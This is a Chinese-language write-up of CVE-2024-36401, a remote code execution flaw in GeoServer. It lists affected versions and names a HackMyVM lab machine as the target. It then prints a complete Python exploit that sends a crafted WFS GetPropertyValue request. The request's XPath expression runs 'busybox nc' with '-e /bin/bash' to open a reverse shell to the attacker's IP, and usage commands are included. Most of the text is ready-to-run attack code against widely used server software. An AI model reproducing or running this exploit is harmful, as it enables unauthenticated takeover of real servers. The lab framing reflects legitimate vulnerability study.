一.漏洞概述CVE-2024-36401 是 GeoServer 中的一个严重级远程代码执行漏洞CVSS 9.8允许未经身份验证的远程攻击者在服务器上执行任意代码。该漏洞源于 GeoServer 调用的 GeoTools 库 API 在评估 XPath 表达式时存在不安全处理导致攻击者可以通过构造特制的请求执行任意代码。影响版本版本范围状态GeoServer 2.23.6受影响2.24.0 ≤ GeoServer 2.24.4受影响2.25.0 ≤ GeoServer 2.25.2受影响安全版本2.23.6、2.24.4、2.25.2 及以上二.环境搭建直接用hackmyvm上的靶机https://hackmyvm.eu/machines/machine.php?vmVictorique目标网站搓一个py代码import requests import argparse def send_request(_target,_port,_ip,_myport): if _port: target f{_target}:{_port} url fhttp://{target}/geoserver/wfs else: target f{_target} url fhttp://{target}/geoserver/wfs headers { Host: target, Content-Type: application/xml, } payload f wfs:GetPropertyValue serviceWFS version2.0.0 xmlns:topphttp://www.openplans.org/topp xmlns:feshttp://www.opengis.net/fes/2.0 xmlns:wfshttp://www.opengis.net/wfs/2.0 valueReferenceexec(java.lang.Runtime.getRuntime(),busybox nc {_ip} {_myport} -e /bin/bash) wfs:Query typeNamessf:archsites/ /wfs:GetPropertyValue try: response requests.post(url, headersheaders, datapayload, timeout30, verifyFalse) if response.status_code in [401, 404, 403]: print(エラー) exit() else: print(成功) except requests.exceptions.RequestException as e: print(error, fAn error occurred: {e}) print(error, Failed to send request!) def main(): parser argparse.ArgumentParser(descriptionCVE-2024-36401) parser.add_argument(--target, requiredTrue, helpターゲットのホスト名を入力してください 例:http://example.com) parser.add_argument(--target_port, requiredTrue, helpターゲットのport番号入力してください 例:8080) parser.add_argument(--myip, requiredTrue, help自分のIPを入力してください 例:10.10.10.12) parser.add_argument(--myport, requiredTrue, help自分の待ち受けポート番号を入力してください 例:9000) args parser.parse_args() target args.target port args.target_port ip args.myip myport args.myport send_request(target,port,ip,myport) if __name__ __main__: main()使用参数python CVE-2024-36401.py --target example.com --target_port 8080 --myip 172.26.16.100 --myport 9000三.攻击复现监听运行代码拿到shell